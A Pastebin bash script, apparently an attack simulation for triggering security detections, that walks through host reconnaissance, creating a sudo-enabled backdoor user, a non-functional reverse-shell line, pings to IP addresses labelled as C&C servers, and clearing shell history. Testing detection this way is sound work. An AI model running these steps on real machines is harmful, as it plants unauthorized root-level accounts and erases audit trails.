Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Running from within the attacked device
- # arguments
- INTERACTIVE=true
- function interactiveCheckpoint {
- if [ "$INTERACTIVE" = true ]
- then
- echo "Press [Enter] to continue attack"
- read continue
- fi
- }
- function attack {
- # Local host reconnaissance detected
- echo "###################################################################"
- echo " Getting device information "
- echo "###################################################################"
- echo $(date -u) " Conducting analysis of host data..."
- uname -a -v -n
- echo $(date -u) " Got host data"
- # Detected suspicious use of the useradd command
- echo "###################################################################"
- echo " Create User and Escalate Privilege "
- echo "###################################################################"
- USER="privilegeduser"${RANDOM}""
- echo $(date -u) " Adding user named ${USER} with privilege root to the system..."
- useradd $USER
- sudo usermod -aG sudo $USER
- echo $(date -u) " Successfully added user named "${USER}" with privilege root to the system"
- echo -e "\e[01;32m$(toilet -f pagga "C&C Connected")\e[00m"
- interactiveCheckpoint
- # Reverse shells, Suspicious IP address communication
- echo "###################################################################"
- echo " Communicating with CnC for getting attack commands "
- echo "###################################################################"
- echo $(date -u) " Opening reverse shell..."
- bash /dev/tcp/ 2> /dev/null
- echo $(date -u) " Reverse shell established"
- echo $(date -u) " Communicating with CnC server..."
- ping -c1 209.17.96.18 > pingtoCnC.txt
- ping -c1 209.17.96.106 > pingtoCnC.txt
- ping -c1 209.17.96.234 > pingtoCnC.txt
- ping -c1 106.51.80.198 > pingtoCnC.txt
- echo $(date -u) " Listening to CnC for future attack commands..."
- # Removal of system logs files detected
- echo "###################################################################"
- echo " Covering Tracks - Deleting Logs and Executables "
- echo "###################################################################"
- echo $(date -u) " Deleting history files..."
- history -c
- echo $(date -u) " Deleted history files"
- }
- POSITIONAL=()
- while [[ $# -gt 0 ]]
- do
- key="$1"
- case $key in
- -ni|--non-interactive)
- INTERACTIVE=false
- shift
- shift
- ;;
- -h|--help)
- usage
- exit 0
- ;;
- *)
- # unknown option
- # save it in an array for later
- POSITIONAL+=("$1")
- shift
- ;;
- esac
- done
- set -- "${POSITIONAL[@]}" # restore positional parameters
- attack
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement